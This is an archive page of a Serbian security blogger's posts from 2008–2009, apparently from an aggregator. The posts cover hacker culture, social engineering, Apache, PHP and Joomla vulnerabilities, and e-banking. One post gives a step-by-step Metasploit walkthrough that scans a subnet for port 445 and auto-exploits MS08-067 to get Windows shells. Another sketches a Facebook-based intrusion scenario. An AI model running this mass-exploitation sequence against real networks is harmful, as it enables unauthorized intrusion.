Godina je 2009. Još malo. Kada se osvrnemo na istoriju malicioznog ponašanja na Netu videćemo jedan pravi muzej. Sećam se kako je devedesetih u vreme modemske telefonske veze sa svetom (ako među čitaocima ima mlađih koji ne znaju šta je to potražite na Netu modem + dial up) glavna zabava bilo pokušati i upasti u terminalski sistem poreske uprave Srbije. Naravno, o tome ništa ne znam. Čuo sam od druga. Ozbiljno. Elem, upadanje na taj i slične sisteme se nije radilo iz realnih malicioznih razloga, bar ne u većini slučajeva, već iz čiste znatiželje. Radoznalost da se to nešto izvede je bila jedna od glavnih pokretačkih sila mnogim mlađanim hakerima. Pričamo o vremenu kada je u Srbiji bilo toliko sajtova da ste ih mogli nabrojati na prste… jedne šake. Onda su se vremena promenila. Web je eksplodirao a sa njim začeci web servisa. Radoznalost je i dalje ostala glavna pokretačka sila negde krajem devedesetih. Neki su želeli da napadaju NATO sajtove i koriste činjenicu da je država opraštala telefonske račune ako kažete da ste se bavili promovisanjem istine o NATO bombardovanju. Sećam se da je jedan poznanik uspeo da napravi račun u vrednosti od 500EU i da je to prošlo kao akt borbe za istinu o zlodelima NATO trupa. Zabavna vremena to behu. Elem, već tada smo mogli da nazremo neki šablon u problemima koje prve web aplikacije imaju. Listu standardnih problema web aplikacija sam pokrio u jednom ranijem tekstu koji možete videti ovde. Godina je 2009. Prošlo je 10 godina od NATO bombardovanja. Internet upotreba je porasla u Srbiji. Eto, čujem da Srbija ima 1 000 000 korisnika Facebooka. *oduševljenje* Često čujem neke svoje poznanike iz BBS vremena kako žale za danima kada ste na IRC kanalima imali gužvu koju čini 50 ljudi. Ne znam da li deca danas i znaju šta je IRC. No, nije ni važno. O tempora, o mores. Sve je postalo web aplikacija sa tendencijama da i web aplikacije postanu web aplikacije. Preterujem. Šala. Dakle, sve je postalo web aplikacija i sve zapravo radi nešto. Sajtovi postaju "pametne" aplikacije. Problem ostaje što korisnici ne postaju ništa pametniji. Povećanje korisnika Interneta, koji su pride vrlo loše edukovani na temu upotrebe te Mreže, povećava faktore za razne maliciozne aktivnosti. Sve je manji i manji broj hakera. Kada kažem haker mislim na pojedinca koji zarad znanja i iz čiste zabave provodi sate, a nekada i dane, pokušavajući da "provali" neki sistem. Sve je postalo ili interes (što mogu da razumem) ili prosto izdrkavanje površnih kretena (ups, vulgaran sam) koji koriste gotove alatke kako bi upali na neki nezakrpljen sistem. Pošto je život postao klik nekako je bilo očekivano da i hakovanje ili "hakovanje" postane klik. Uz razne alatke poput Metasploita i sl. gotovo svako može da uradi nešto maliciozno a da pritom blage veze nema šta je zapravo uradio i kako to suštinski radi. Ne, bitno je da je uradio. I time postao "haker". Tužno ali istinito. Ne verujete mi? Pogledajte komentare ovde. Padom kvaliteta "hakera" je pao i kvalitet svrhe zbog koje se radi to što se radi. Najniže besmislene pobude. Ne verujete mi? Pogledajte komentare ovde. No, gore navedeni problemi (po meni su to problemi) su otvorili nove mogućnosti. Oni još uvek dobri programeri su počeli da pišu bolji kod i suštinski više nije baš tako lako hakovati aplikacije. To je dobra stvar. Zbog toga se napadači polako ali sigurno okreću novoj-staroj meti. Korisniku. Kao što sam ranije komentarisao, više nije zabavno juriti rupe u računarskim sistemima. One su tu ali se dosta brzo popravljaju. Dobar programer i dobar administrator će se oko njih pobrinuti ili bar fino otežati eksploataciju istih. Ili će biti lenji pa neće to uraditi ali nećemo sada u detalje. Ono što nikada neće moći da zakrpe jeste čovek sa svim svojim propustima i manama. Već neko vreme gledamo rađanje nove ere. Ere hakovanja ljudi ili kako se to popularno zove soc-eng - social engineering. Socijalni inžinjering podrazumeva nebrojeno puno stvari od kojih je NLP samo jedna. Napredak savremene psihologije i psihoanalize su omogućili uvid u čovekov um na način na koji to nikada ranije nije bilo moguće. Čovek je sistem koji je moguće hakovati kao i bilo koji računar. Ne verujete mi? Ali radite to svakog dana a da toga niste ni svesni. Porazmislite o tome. Dobro, i šta sada, pitate me vi? Ništa. Ovo je tek još jedno od mojih razmišljanja na temu socijalnog inžinjeringa i čoveka kao problema. Jer kao što mi neko reče na jednom IRC kanalu pre par dana (da, ja još uvek koristim IRC jer su posle najezde idiota na kanalima ostali OK ljudi… svi ostali su na Facebooku): Problem svih računarskih sistema se nalazi između računara i stolice. Možda ako nastavim da budem dosadan sa ovim problemima veći broj ljudi počne da koristi glavu i ne pravi gluposti. A možda i ne. Nije ni važno. Uzgred, kada imate vremena pogledajte animu Ghost in the Shell… i prvi i drugi deo.
Planeta Srbija
Скуп блогова на српском језику
Архива за 'security' категорију
I just ran into this really cool comic that explains how AES actually works. It’s funny and rather geeky –> Advanced Encryption Standard (AES)
As it was reported by quite a few people in the past few days - official Apache web site was compromised on Friday. I suggest reading and following the info they are publishing on their blog: Apache Infrastructure Team. Here you may see the info that was on the official web pageon Friday. Since more than half of the Internet runs on Apache web servers this is a serious issue. And though nothing seems to be damaged and compromised when it comes to the code base and the packages of Apache HTTPD I would agree with Apache team when they say: "While we have no evidence that downloads were affected, users are always advised to check digital signatures where provided."
Došao je i taj dan da mene smlati trojanac. Ošašavio me je ko mladog majmuna i još uvek ne znam šta se dogodilo.
Sinoć su počeli ljudi da mi prijavljuju za par sajtova da im Firefox prijavljuje da su opasni i ne dozvoljava pristup. Nisam se iznenadio, jer sam nedelju dana ranije već otkrio trojanca koji je napao četiri sajta koje […]
Prologue Software flaws are becoming less interesting to me as time passes by. I work around software, I really enjoy messing with the code, checking how it works, finding flaws in it and so on. Yet, my focus moves to a new target. A piece of software that has been around for very long. Piece of software that is sometimes very hard to crack and sometimes so easy. One thing is sure - it’s never the same. It keeps expanding, moving and changing. Sometimes it’s very encrypted and sometimes it’s just plain text. Human mind. *** Social networks are here to stay. That’s a fact. I figure that most copanies have figured that up to now and have started exploiting that fact in every possible way. By exploiting I don’t mean tons of spam and banners. I think that only companies in Serbia are still using that kind of marketing nowadays. Or most of them anyway. No, by exploitation I mean using major social networking systems such as Facebook, MySpace, Twitter, Digg and similar to promote business and/or products and to achieve something that has never been possible in this way before - direct/live contact with the customers. Getting good feedback is of great importance for any company that tends to lead on the market. No matter what they produce and sell they need to be faster in any way possible compared to their opponents. It’s kill or get killed market. And a good feedback from the customers may help staying a live. The fact that Internet usage is expanding in Serbia has brought the issue of social networking usage in business to my attention. Not in a way that I want to put some marketing theories on how to achieve the best promotion using all the gadgets these networks bring. I’m more interested in security aspects of this story. In the old days companies had their networks closed to the world. And hacking that kind of a network was a real challenge in most of the cases. All that has changed. No matter how tight security policies are in any company their strenght is governed by that old rule - your security is as strong as it’s weakest point is strong. Are you starting to see where am I going with this? No. OK. Let’s say you use all the best security policies that can be found. Let’s say you have the best sysadmins money can buy. And let’s say you are not using buggy and risky software on the workstations in your company. You are a true Fort Knox, right? Wrong. John Doe sits by his workstation, does what ever is that he’s doing in your company and logs into Facebook - bang! All your security efforts go to bits. It’s not a software error that we see here. No, it’s the weakest point in your network - human. Unless you have androids working for your company you are facing a serious threat from each of your employees every day. Some companies have started using even tighter measures such as prohibiting the usage of Facebook or doing any private business while at work. That’s fine but I’m not talking about those companies. I’m more interested in those companies that have realized the true potential of social networking and all those technologies of tomorrow. As you may have noticed I’m using a lot of social network web sites. I have nothing against them. Yet, I’m rather cautious about what I write over there. I’m not a company and I don’t have to worry that much even if I write something people may not like but I’m still very cautious. If I were a company where would I draw the line? I want to fully use all the potential of all those networks but I don’t want to suffer cause of it. This may sound silly to some people but times have changed and you can not just use the social network. A company now needs a really well crafted plan and a strategy on this issue. And what I find the most important - it needs a new security policy for the way those networks will be used. Let’s say person A wants to penetrate some company’s network. The easiest way would be to have an insider. And even better would be to have an insider who doesn’t even know he/she is doing anything wrong. Let’s say our guy meets this girl that works for company B on Facebook. By scanning her profile he figures out that she likes English poetry of the XIX century. Good. He starts talking to her and sends her some Byron or Keats verses now and then. She falls for it. They start talking day by day for some time. He gains her trust. Now and then he goes into some computer talk just to see how much of a techie she is. No, she’s no techie at all. Good. He has built a completely false identity for this purpose. One day he starts saying bad things about the sysadmins at his company - they won’t come and help him with this or that. She starts complaining about the same guys at her company. Good, they have lame sysadmins. Time passes and he gets more and more technical info on her company’s system. He finds out that they don’t update their workstations on a regular basis. Then he gives her some nicely crafted links telling her that he has left some pictures or poems for her over there. The poems are there but a bit more is in those pages. He starts collecting the data on her browser, OS and so on. And at one point he hijacks her computer. She doesn’t even know it. Yet, he is in her network and her company just got "twitted". Someone will argue that this may happen no matter what. That it has been happening in the past even without social networks. This is true. Social networks have made things like these easier to achieve. And they have made the surface for the attack way wider than before. So think before you go into frenzy about putting your company on Twitter. Do it if it will be of any use but make a plan about it before you do. Humans are pretty easy to hack. Sometimes easier than software.* - term I crafted for being owned over a social network.
This seems like a day for some nasty bugs on the web. As I mentioned in my earlier post, latest PHP has new/old flow in it. Two days ago a new tool for doing DoS attacks on Apache web server was released and it’s called Slowloris. From the web page of the creator of this nifty Perl tool: "Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win - and sooner than later." Apparently neither Microsoft IIS nor Lighttpd are affected by this flaw. It will be interesting to follow this story in the comming days.
PHP dev team released new version of PHP 5.2.x two days ago. This version brings a few security fixes and a lot of bug squashing. Alas, there was one seriously wrong fix. A bug that we’ll call "PHP safe_mode bypass with exec/system/passthru" was supposedly fixed in this latest version. Supposedly. It’s still there. And here is a proof of concept. I’ll wait with upgrading to 5.2.10.
There is serious XSS vulnerability affecting all Joomla! versions prior to 1.5.11 which was released just a few days ago.DESCRIPTION: JA_Purity template is bundled in Joomla! and fails to sanitized user supplied input. An attacker can inject JavaScript or DHTML that will be saved in the cookie making persistent, running in the context of targeted user browser, allowing him to steal cookies. IMPACT: An attacker can exploit the vulnerability to store persistent XSS. This may lead in steal the targeted user cookies and gain access to the user account. Full disclosure at PacketStorm. So, still using old Joomla!?
Dosta dugo nisam pisao ništa na srpskom. Za to su najviše odgovorni nebulozni komentari vezani za tekstove koje sam pisao o Facebooku. Ne, neću vas naučiti kako da kradete lozinke… niko vas to neće naučiti. Dođavola. Elem, reših da malo piskaram na srpskom i da dotaknem neke domaće teme. (eng. speaking visitors… proceed, nothing to see… internal Serbian stuff…) Već neko vreme mi se motaju po glavi neki tekstovi. No, ono što bih danas voleo da pitam sve prisutne jeste: šta mislite o poverenju? Da se pojasnim. Većini vas je poznat termin "cloud computing". Do sada su valjda i zidovi naučili da tako nešto postoji. No, pretpostavljam da većina vas pojma nema šta je to. Svi o tome pričaju. To je u trendu i totalno IN. Kao i jedno milion stvari u poslednjih 10 godina. Opustite se, proći će. Sve je to od ovog sveta. Dakle, kompjuteri u oblacima, kako volim da kažem, jeste nešto tako matoro da pričati o revolucionarnom tehnološkom rešenju jeste u najmanju ruku smešno. Zašto? CC, kako ću dalje zvati ovaj hit, je ništa drugo nego modernizovana verzija "time sharing" sistema iz šezdesetih. Stari model deljenog procesorskog vremena je bio popularan jer su računari u to vreme bili jako skupi. Kasnije je otišao u istoriju kada su personalni računari postali popularni i jeftini. Dakle, svi danas govore o CC. Svi koriste CC. Nema tu ničeg lošeg. Svi koriste Facebook, svi koriste Twitter i ko zna šta još ne. A šta je sa bezbednošću? Ne, neću paranoisati opet. Ovo nas vraća na ono moje pitanje od ranije. Šta mislite o poverenju? Shvatimo, koliko god se bilo kod od nas trudio da ima bezbedan računar uvek će postojati neka rupa. Faktički, kompletan naš svakodnevni digitalni život počiva na poverenju koje poklanjamo nekoma. Da li je to proizvođač hardvera, firma koja je proizvela operativni sistem koji koristite ili naš Internet provajder… sve se svodi na isto. Zbog prvih možemo da izugibimo podatke, drugi mogu da budu krivi što su nas napali virusi ili nam je neko ukrao podatke, a treći mogu da prate šta radimo i da te informacije daju na upotrebu nekom trećem licu. Dakle, svakog dana mi verujemo nekome. Za ove prve baš i nemamo rešenje sem da redovno radimo backup… a opet, tu je i proizvođač medija koji koristimo za čuvanje tih podataka. Za ove druge imamo rešenje… možemo da koristimo nešto bezbednije. Za ove treće… ima rešenja i za to, napisaću možda kasnije kako njih da zaobiđete. No, sve u svemu poverenje je ključna reč. Dobro, a sada se vratimo na CC. Dakle, šta je ovde drugačije od bilo čega do sada. Bilo koja firma koja pruža CC usluge je samo još jedan faktor u svakodnevnoj igri poverenja. Umesto da sami brinemo o bezbednosti sistema koji koristimo mi prepuštamo tu brigu nekome tamo. I to je nešto sa čime moramo da živimo, zar ne? I onda, da se po poslednji put vratim na pitanje - šta mislite o poverenju? Mislim da danas skoro svako ima sajt ili dva. Hosting je posao u cvatu u Srbiji… a ja sam vrlo srećan što sam na vreme pobegao sa te livade… dok još nije potpuno procvetala. Dakle, kakvi su vaši utisci kada je u pitanju poverenje koje morate da imate u odnosu sa svojim provajderima različitih usluga na Internetu? Kakve garantije domaći provajderi nude da nećete preko noći ostati bez svojih podataka? Da li ste potpisali ugovore sa njima ili ste samo po navici kliknuli na "Slažem se" u online formularu (dok ste bili oduševljeni kako je procedura kupovine brza i sjajna)? Danas je vrlo kišan dan i eto došlo mi da malo mračim.
Prilikom izrade sajtova, ono o čemu se često najmanje misli je sigurnost servera. Nažalost, vrlo je lako u PHP-u napraviti neku rupu preko koje napadač može da zloupotrebi sajt, odnosno server na kome je on postavljen.
Najvažnije je da je sam server podešen tako dje upad otežan ili onemogućen. Kako postoji mnogo načina da se upad izvede teško je sve to pratiti i proveravati.
U nastojanju da se posao provere olakša, PHP Security Consortium je objavio PHP skript PhpSecInfo koji proverava kako je sam PHP podešen i upozorava na moguće slabosti. Skript se koristi na sličan način kao i PHP funkcija phpinfo().
Ovaj skript ne pronalazi greške u vašem PHP programu, već proverava sam server, odnosno podešavanje PHP okruženja na serveru. Kada naiđe na neko…
Nekada davno, u vremena skoro zaboravljena, kada bi neko hteo da ozbiljno ugrozi neki sistem na Mreži morao bi sam da nađe propust i da napiše eksploit za isti. Za one manje upućene, eksploit je skripta ili program koji napada poznati propust u nekom programu. Pretpostavimo da naša žrtva na svom serveru ima, recimo, FTP server verzije 1.2.3. Ta verzija je zastarela i svi već znaju da se u njoj nalazi propust koji omogućava manje ili više zlonamernim napadačima da uđu na sistem bez pravile provere lozinke. Da bi to zaista radilo potrebno je uspostaviti vezu sa FTP serverom i poslati mu neke komande od kojih će ovaj dobiti epileptični napad i otvoriti vam svoje dveri. Eksploit je programičić koji radi baš to. Prisan je za specifičan progam i, obično, specifičnu verziju tog programa. Sve što radi kada se pokrene jeste izvršavanje malicioznog koda. Dakle, u skoro zaboravljena davna vremena, mlađani haker je morao sam da napiše eksploit. Morao je zapravo da upotrebi mozak kako bi dobio pristup sistemu. Danas… hmm… danas su stvari drugačije. Voleo bih da vas upoznam sa Metasploit projektom. U pitanju je fenomenalan sistem za pisanje eksploita svih vrsta koji u sebi donosi fenomenalnu biblioteku već postojećih eksploita. Kao što naslov kaže - Point. Click. Root. Izaberete žrtvu, kliknete na eksploit koji vas zanima i… dobijete root. Dobro, nije baš tako jednostavno ali se svodi na to. Posebno kada znamo da dobar deo sistema na Internetu čine ne baš ažurirani serveri. "Neće niko nas" je sjajna logika za sigurno uništenje.Šta je zapravo Metasploit? Jedna od mojih omiljenih alatki. Pošto mi je deo posla i tzv. Penetration testiranje Metasploit je jedna od alatki bez koje bi mi posao bio daleko komplikovaniji. Što ne znači da već nije. Dakle, Metasploit je program pisan u Ruby programskom jeziku a sadrži komponente pisane u C i ASM-u. Njegova osnovna svrha je da programerima donese razvojno okruženje za pisanje eksploita i drugih bezbednosnih alatki. Njegov osnovi sistem podrazumeva postojeću biblioteku eksploita koje je moguće konfigurisati po potrebi. Potom se eoksploit izvršava na ciljani server. Ukoliko se sve završi uspešno korisnik dobija pristup sistemu koji je napao. Primer: Upešno izveden napad na VNC server koji se nalazi na Windows 2000 serveru.A sada tema dana - masovna eksploatacija za idiote Ne znam zašto ali kada god vidim neki od naslova "… for dummies" to prevedem kao "… za idiote". Najnovija verzija Metasploita 3.2 donosi jednu sjajnu novinu. Zamislite da se nalazite u situaciji kada treba napasti veći broj sistema. Da, znam… naporno je kliktati i napadati jedan po jedan. Težak je hakerski posao. E pa dragi moji hakeri, novi Metasploit donosi rešenje za bol u vašem zglobu. Mogućnost istovremenog napada većeg broja sistema. Kao primer će nam poslužiti izvršavanje eksploita MS08-067 na port 445 koji je otvoren na većem broju hostova koji se pak nalaze u C klasi adresa. Za početak pokrenite msfconsole na svojoj BSD ili GNU/Linux mašini. Potrebni su vam SQLite3 gem za Ruby kao i novija verzija Nmap skenera. Kada se Metasploit (msf) komandna linija pojavi učitajte sqlite3 drajver:msf > load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3Zatim ćemo upotrebiti db_create komandu za pokretanje nove SQLite3 baze podataka i povezivanje iste na Metasploit sistem: msf > db_create [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db Kako bismo ubrzali testiranje upotrebićemo db_nmap komandu sa veoma ograničenim nizom komandi. Cilj nam je da nađemo sve mašine kojima ja otvoren port 445 na ciljanoj podmreži:msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24 Konačno, pokrećemo db_autopwn komandu sa -e opcijom za eksploataciju, -p opcijom da odredimo ciljani port, -b opcijom za dobijanje shell-a i -m opcijom za pokretanje svih modula sa "ms08_067" stringom u svom imenu:msf > db_autopwn -e -p -b -m ms08_067 Kada se ova komanda izvrši možemo izlistati sve aktivne veze koje smo uspeli da ostvarimo:msf > sessions -l Active sessions =============== Id Description Tunnel – ———– —— 1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86 Upotrebimo session -i SID kako bismo se povezali na ciljani sistem: msf > sessions -i 1 [*] Starting interaction with 1… Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32> Voila! Nekada davno je sve ovo bilo zapravo zabavno. A sada…
I’m actually not killing the blog itself. Nor will I delete all the content. You see, I actually never planned to run a blog on this domain at first place. Long time ago, when I bought eccegeek.info, I had an idea to have just one page with my CV and that’s it. Then came bloga era. I’ve been thinking to change the domain for my blog for quite some time now. I just couldn’t find the right one. And the name is perhaps the most important thing for online presence. People like nice domain names they can remember without writing it down. I’ve been having quite some problems with my current domain. Is it with two "c"? No, wait. Two "e"? I play with security. I work with security. Security has became my preocupation. And when I say security I mean everything from server and network security to, what I find most interesting, human as a security risk. Human rights online, freedom of speech, free software… all very tightly connected with various aspects of security. So, before I reveal the new name for my website let me quote you a little story from our dear Wikipedia:"The Securitate (Romanian for Security; official full name Departamentul Securităţii Statului, State Security Department), was the secret service of Communist Romania. Previously the Romanian secret police was called Siguranţa statului (State Safety). Founded on August 30, 1948, with help from the SovietNKVD, the Securitate was abolished in December 1989, shortly after PresidentNicolae Ceauşescu was ousted.
The Securitate was, in proportion to Romania’s population, one of the largest and most brutal secret police forces in the Eastern bloc.[1] The first budget of the Securitate in 1948 stipulated a number of 4,641 positions, of which 3,549 were filled by February 1949. By 1951, the Securitate’s staff had increased fivefold, while in January 1956, the Securitate had 25,468 employees.[2] Under the regime of Nicolae Ceauşescu, the Securitate employed some 11,000 agents and a half-million informers.[1] (By way of comparison, as of September 2001, the CIA numbered about 18,000 employees.[3])" –> http://en.wikipedia.org/wiki/Securitate
Have you guessed by now? Yeah. I’ve bought myself so damn cool domain - sekuritatea.com :))) In two days period rehash.eccegeek.info will be out of service.. it’ll just redirect to www.sekuritatea.com. So, update your bookmarks and RSS readers on Thursday. I’ve got a lot of good stuff cooking for this "new" web site.:)
I’m actually not killing the blog itself. Nor will I delete all the content. You see, I actually never planned to run a blog on this domain at first place. Long time ago, when I bought eccegeek.info, I had an idea to have just one page with my CV and that’s it. Then came bloga era. I’ve been thinking to change the domain for my blog for quite some time now. I just couldn’t find the right one. And the name is perhaps the most important thing for online presence. People like nice domain names they can remember without writing it down. I’ve been having quite some problems with my current domain. Is it with two "c"? No, wait. Two "e"? I play with security. I work with security. Security has became my preocupation. And when I say security I mean everything from server and network security to, what I find most interesting, human as a security risk. Human rights online, freedom of speech, free software… all very tightly connected with various aspects of security. So, before I reveal the new name for my website let me quote you a little story from our dear Wikipedia:"The Securitate (Romanian for Security; official full name Departamentul Securităţii Statului, State Security Department), was the secret service of Communist Romania. Previously the Romanian secret police was called Siguranţa statului (State Safety). Founded on August 30, 1948, with help from the SovietNKVD, the Securitate was abolished in December 1989, shortly after PresidentNicolae Ceauşescu was ousted.
The Securitate was, in proportion to Romania’s population, one of the largest and most brutal secret police forces in the Eastern bloc.[1] The first budget of the Securitate in 1948 stipulated a number of 4,641 positions, of which 3,549 were filled by February 1949. By 1951, the Securitate’s staff had increased fivefold, while in January 1956, the Securitate had 25,468 employees.[2] Under the regime of Nicolae Ceauşescu, the Securitate employed some 11,000 agents and a half-million informers.[1] (By way of comparison, as of September 2001, the CIA numbered about 18,000 employees.[3])" –> http://en.wikipedia.org/wiki/Securitate
Have you guessed by now? Yeah. I’ve bought myself so damn cool domain - sekuritatea.com :))) In two days period rehash.eccegeek.info will be out of service.. it’ll just redirect to www.sekuritatea.com. So, update your bookmarks and RSS readers on Thursday. I’ve got a lot of good stuff cooking for this "new" web site.:)
So, boys and girls, the new Joomla! is out."The Joomla Project announces the immediate availability of Joomla 1.5.9 [Vatani]. This is a security release and users are strongly encouraged to upgrade immediately. It has been around two months since Joomla 1.5.8 was released on November 10, 2008. The Development Working Group’s goal is to continue to provide regular, frequent updates to the Joomla community. " Aaaaand? Have you updated yet? No? Using old "stable" proven versions like 1.5.2 or 1.5.4. Good. Very smart. Come on, people! Joomla! is just a piece of software. And software, as all intelligent people out there know, is not perfect. It never was and it won’t be in the near future. Thus, when development team of software A publishes patches and updates the users are urged to apply them for their own sake. I really don’t care if you think I’m wrong from blaming website admins when their sites get hacked. You need to be an idiot to think that once installed CMS is never to be updated. I would understand if the procedure was too complicated to be done once a month. And not even that is an excuse but I would understand. Alas, Joomla! update procedure is so damn simple. Three steps:Step 1. Go to http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseView&release_id=9293 and download the patch.Step 2. Unpack the archive on your computerStep 3. Using your favorite FTP client upload and overwrite all the files on your website. Voila! Was that hard? So, what will it take for you to start acting responsibly towards your own website? Another attack of tribal "h*ckers" from the South?
"Nov 1, 2008. We are pleased to announce the official release of OpenBSD 4.4. This is our 24th release on CD-ROM (and 25th via FTP). We remain proud of OpenBSD’s record of more than ten years with only two remote holes in the default install."
To je bila poruka koju sam juče dobio sa mailing liste OpenBSD-a. Kao i uvek, pouzdani tim OpenBSD-a je obradovao sve korisnike ovog sjajnog operativnog sitema novom verzijom tačno na vreme. Novi OpenBSD donosi stotine novina (predlažem da pogledate http://www.openbsd.org za detalje) od kojih je za mnoge najvažnije proširena podrška za wireless kartice i… 3D akceleracija za grafičke kartice. Već nekoliko meseci na laptopu koristim OpenBSD CURRENT tako da sam imao priliku da pratim razvoj sistema. 3D sa Intel grafičkim karticama radi besprekorno - sistem je radio sasvim lepo i bez Intel DRM-a ali sada sve to izgleda daleko bolje. Svaka čast OpenBSD timu za odličan posao i hvala im za sjajan operativni sistem.
Nisam verovao da će doći dan kada ću reći nešto lepo o nekoj banci u Srbiji. Ove naše su kao najgora pošast jer ako malo bolje pogledate grad u poslednjih par godina videćete da je više ekspozitura banaka nego kioska sa pljeskavicama. Izgleda da je bankarstvo izuzetno unosan posao. Hmm.. no dobro, jednom sam rekao da na blogu neću izlagati svoje državno-društveno-političke stavove te neću sada prekršiti datu reč. Ovaj blog je posvećen Slobodnom softveru, bezbednosti i geek stvarima. Često me ljudi pritaju šta mislim o el.bankarstvu u Srbiji. Mislim da je užasno nebezbedno i da do sada nije bilo većih problema jer ili ovde nikog ne zanima da krade preko Mreže (hahah, eto šale) ili banke uspešno kriju da tu i tamo ipak imaju probleme. Tipujem na ovo drugo. Gotovo ni jedna banka u nas ne poštuje opšta pravila bezbednog el. poslovanja a svaku moju želju da išta radim preko Interneta ubijaju činjenicom da je za takvu aktivnost potreban Internet Explorer. Pre 3-4 dana me zovu iz "moje" banke da me pitaju da li sam zainteresovan za korišćenje nove e-banking usluge. Société Générale sam izabrao iz razloga koji nemaju ama baš nikakve veze sa kvalitetom poslovanja. Već sam otprilike rekao šta mislim o bankama u Srbiji. Ovi su mi bili simpatični jer su francuska banka, šta ću Francuzi su mi draži od ostalih i drugo, koriste crno i crveno kao svoje boje - pao sam na taj estetski momenat - dopada mi se izgled čitave banke. LOL Elem, sada će neko reći da sam potpuno lud i neozbiljan ako su mi ovo bili kriterijumi za izbor lokacije za čuvanje para. To je… moguće. Sa druge strane, kako je u ovoj državi sve apsurdno pa i to bankarstvo zašto bih se uopšte opterećivao izborom banke kada su sve do jedne pijavice? Neću uzimati kredite, ne zanima me 99% usluga koje bilo koja banka nudi a opet ne želim da novac držim u slamarici. Kada znate te činjenice onda vam moj sistem odabira banke i neće biti tako besmislen, zar ne? Elem, da se vratimo na poentu priče i naslov ovog teksta. Dva dana pošto su me pozvali odem do banke da potpišem ugovor ili ga ne potpišem. Sve je zavisilo od toga šta će mi reći kada ih pitam koji su tehnički uslovi za taj e-banking. Došao sam do svoje ekspoziture i pre nego sam potpisao postavih ovo pitanje. Ljubazno osoblje (SoG ima izuzezno cool osoblje što se ne može reći za većinu banaka. Ljubazni su oni svuda ali su ovde u većini slučajeva i strašno cool ljudi, a posebno ekipa iz moje ekspoziture) mi je reklo da oni baš i ne vladaju tim tehničkim momentima ali da imaju prospekt koji će mi pomoći. Dobijam lepo dizajniranu knjižicu i već na prvoj strani mi se ozari lice. Strana kaže sledeće: Da bi koristili SOGE home-bank, potrebno je da ispunite minimalne tehničke uslove: - Internet konekcija : 28.8Kbps - Računar sa Windows, Linux ili Mac OS operativnim sistemom i Internet pretraživač koji podržava 128-bitnu SSL enkripciju, npr: - Windows : Internet Explorer 6.0, FireFox 2.0, Opera 9.0- Linux : FireFox 2.0, Opera 9.0 - Mac OS : Safari 1.0, Internet Explorer 6.0, FireFox 2.0 Da, da… SoG je GNU/Linux friendly i misli na ljude koji ne koriste Windows. A što je najlepše, čak i ako se neko zezne pa koristi Win i tamo može raditi koristeći Firefox. Baš lepo od njih. Kada sam pogledao dalja uputstva sa slikama video sam da su svi primeri rađeni upotrebom Firefox-a tako da ne samo da podržavaju upotrebu tog pretraživača već je ceo prospekt pun slika kako sistem izgleda u istom. A da li ću zaista koristiti pogodnosti ovog sistema? To ćemo tek videti. Čekam da mi stignu svi pristupni podaci pa ću onda pronjuškati da vidim koliko je zaista bezbedno koristiti ovaj sistem. Ipak ovaj pomak je zaista divna stvar i iskreno se nadam da će i ostale banke krenuti stopama SoG-a… a ne kao neke kod kojih je e-banking = Internet Explorer.
[tekst koji sledi je pun cinizma, sarkazma, eksplicitnog jezika i humora] Pre čitanja ostatka teksta videti: http://www.b92.net/info/vesti/index.php?yyyy=2008&mm=09&dd=11&nav_id=318102 Dobro bre ljudi, koj’ vam je k*rac, bre! Ne stigoh juče da napišem komentar na događaje dok su trajali. Sedim tako na poslu i do mene dođe vest da su "srokali" opet nekoliko sajtova. Izgleda da juče ni mod.gov.yu nije radio neko vreme. Kada sam par puta išao na sajt umesto prezentacije sam video default stranicu CentOS Apache instalacije. WTF!? Šta treba da se desi da nekome dođe iz dupeta u glavu i da makar malo poradi na bezbednosti sajtova državnih institucija? Eto, čitam intervju sa Slobom Markovićem na B92. Voleo bih da se ono što on kaže zaista desi. Prosto mi je nezamislivo da ozbiljne institucije kao što su vojska ili Skupština sebi dozvole difejsovanje sajtova. I jedna poruka novinarima pošto znam da pre ili kasnije neko od njih dođe na ovaj blog. Ajd’ leba vam prekinite da koristite termin "haker" u kontekstu rušenja sajtova što kod nas što drugde, jel može? Kaljate ime čitavom jednom esnafu. :D Ozbiljno. Ako želite da napišete smislen tekst kontaktirajte bar nekog ko zna šta priča. Eto, sada imate Slobu u Ministarstvu. A ja vam sigurno neću odbiti pomoć ako me kontaktirate. Huh! Gledam ovaj tekst gore i nalazim da ne liči baš na moje uobičajeno pisanje. Eksplicitan jezik baš i nisam ja. Ali mi je prekipelo da slušam sve te priče o ‘akerima koji konstantno napadaju nezaštićene sajtove državnih institucija. Zar je tako teško uposliti ljude odavde da srede te servere? A imamo ih nije da ih nemamo. Znam da bi uobičajen srpski odgovor na ovo što se desilo bio vendeta. I verujte mi, nije problem da obrišemo celo Kosovo sa Interneta. Da sad imam nešto manje godina i da mi je glava usijana kao što je nekada bila verovatno bih zagovarao tako nešto. No, mene trenutno više zanima kako da se popravi bezbednosno stanje sajtova u Srbiji. Da mi lepo obezbednimo svoje dvorište pa ćemo lako da ugasimo Internet celom svetu. Dokle god se u našim medijima bezbednost online prisustva pominje samo u kontekstu rušenja sajtova i samo onda kada se takve stvari dešavaju ništa se neće promeniti. I da sumiramo. Bezbednosna kultura u Srba je jednaka nuli sa tendencijama da ode ispod nje.
